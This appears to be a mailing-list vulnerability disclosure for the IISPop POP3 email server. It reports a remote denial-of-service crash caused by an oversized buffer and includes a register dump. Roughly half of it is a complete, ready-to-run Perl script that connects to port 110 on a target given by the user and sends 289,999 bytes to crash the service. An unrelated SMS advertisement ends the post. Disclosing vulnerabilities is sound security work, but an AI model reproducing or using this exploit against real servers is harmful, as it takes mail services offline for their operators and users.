IISPop remote DOS

[securma massine <securma () caramail com>]

hi

The IISPop EMail Server (http://www.curtiscomp.com/)was
designed for small networks,This is a POP3 only server,
designed to be paired with the SMTP server bundled in
Windows 2000/IIS 5.

 I have found that IISpop is vulnerable has a attack DOS
caused by sends of a broad buffer (289999 byte) this attack
gives the following state of the registers (tested on v
1.161 end 1.181)

Access violation - code c0000005 (first chance)
eax=00000041 ebx=00407d3d ecx=00000101 edx=000021ae
esi=0040693d edi=00437181
eip=77e76941 esp=0112ffb0 ebp=0000026c iopl=0 nv up
ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038
gs=0000 efl=00000206
KERNEL32!GetCurrentThreadId+4:
77e76941 0000 add [eax],al
ds:0023:00000041=??

(unhandled exeption in IISPop.exe (KRNELL32.DLL)
0xc0000005 : access violation

exploit:
#!/usr/bin/perl -w
# tool : iispdos.pl
# shutdown all version of IISPop
# greetz crack.fr , marocit ,christal
#

use IO::Socket;

$ARGC=@ARGV;
if ($ARGC !=1) {
        print "\n-->";
 print "\tUsage: perl iispdos.pl <host> \n";
        exit;
}

$remo = $ARGV[0];
$buffer = "A" x 289999;

print "\n-->";
print "\tconnection with $remo\n";
unless ($so = IO::Socket::INET->new (Proto => "TCP",
                                         PeerAddr => $remo,
                                         PeerPort
=> "110"))
{
 print "-->";
 print "\tConnection Failed...\n";
 exit;
}
print $so "$buffer\n";
close $so;

print "-->";
print "\tnow test if the distant host is down\n";
exit;


_________________________________________________________
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors coût du SMS)